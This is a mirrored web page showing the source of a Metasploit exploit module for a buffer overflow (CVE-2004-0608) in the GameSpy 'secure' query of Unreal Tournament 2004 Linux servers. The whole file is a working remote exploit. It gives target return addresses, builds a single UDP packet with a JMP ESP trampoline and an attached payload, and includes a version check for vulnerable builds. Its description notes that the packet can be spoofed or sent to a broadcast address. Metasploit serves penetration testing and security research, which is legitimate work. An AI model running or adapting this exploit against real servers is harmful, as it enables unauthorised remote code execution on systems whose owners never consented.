Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/linux/games/ut2004_secure.rb
19592 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Remote

7
  Rank = GoodRanking

8


9
  include Msf::Exploit::Remote::Udp

10


11
  def initialize(info = {})

12
    super(

13
      update_info(

14
        info,

15
        'Name' => 'Unreal Tournament 2004 "secure" Overflow (Linux)',

16
        'Description' => %q{

17
          This is an exploit for the GameSpy secure query in

18
          the Unreal Engine.

19


20
          This exploit only requires one UDP packet, which can

21
          be both spoofed and sent to a broadcast address.

22
          Usually, the GameSpy query server listens on port 7787,

23
          but you can manually specify the port as well.

24


25
          The RunServer.sh script will automatically restart the

26
          server upon a crash, giving us the ability to

27
          bruteforce the service and exploit it multiple

28
          times.

29
        },

30
        'Author' => [ 'onetwo' ],

31
        'License' => BSD_LICENSE,

32
        'References' => [

33
          [ 'CVE', '2004-0608'],

34
          [ 'OSVDB', '7217'],

35
          [ 'BID', '10570'],

36


37
        ],

38
        'Privileged' => true,

39
        'Payload' => {

40
          'Space' => 512,

41
          'BadChars' => "\x5c\x00"

42


43
        },

44
        'Platform' => 'linux',

45
        'Targets' => [

46
          ['UT2004 Linux Build 3120', { 'Rets' => [ 0x0884a33b, 0x08963460 ] }], # JMP ESP , (free/realloc) BSS pointer

47
          ['UT2004 Linux Build 3186', { 'Rets' => [ 0x088c632f, 0x089eb2f0 ] }],

48
        ],

49
        'DisclosureDate' => '2004-06-18',

50
        'Notes' => {

51
          'Stability' => [CRASH_SERVICE_RESTARTS],

52
          'Reliability' => [UNRELIABLE_SESSION],

53
          'SideEffects' => [IOC_IN_LOGS]

54
        }

55
      )

56
    )

57


58
    register_options(

59
      [

60
        Opt::RPORT(7787)

61
      ]

62
    )

63
  end

64


65
  def exploit

66
    connect_udp

67


68
    buf = make_nops(1024)

69
    buf[24, 4] = [target['Rets'][1]].pack('V')

70
    buf[44, 4] = [target['Rets'][0]].pack('V')

71
    buf[56, 4] = [target['Rets'][1]].pack('V')

72
    buf[48, 6] = "\x8d\x64\x24\x0c\xff\xe4" # LEA/JMP

73


74
    buf[0, 8] = '\\secure\\'

75
    buf[buf.length - payload.encoded.length, payload.encoded.length] = payload.encoded

76


77
    udp_sock.put(buf)

78


79
    handler

80
    disconnect_udp

81
  end

82


83
  def ut_version

84
    connect_udp

85
    udp_sock.put('\\basic\\')

86
    res = udp_sock.recvfrom(8192)

87
    disconnect_udp

88


89
    if res && (m = res.match(/\\gamever\\([0-9]{1,5})/))

90
      return m[1]

91
    end

92


93
    return

94
  end

95


96
  def check

97
    vers = ut_version

98


99
    if !vers

100
      return CheckCode::Unknown('Could not detect Unreal Tournament Server')

101
    end

102


103
    print_status("Detected Unreal Tournament Server Version: #{vers}")

104


105
    if (vers =~ /^(3120|3186|3204)$/)

106
      return CheckCode::Appears('This system appears to be exploitable')

107
    end

108


109
    if (vers =~ /^(2...)$/)

110
      return CheckCode::Detected('This system appears to be running UT2003')

111
    end

112


113
    return CheckCode::Safe('This system appears to be patched')

114
  end

115
end

116


117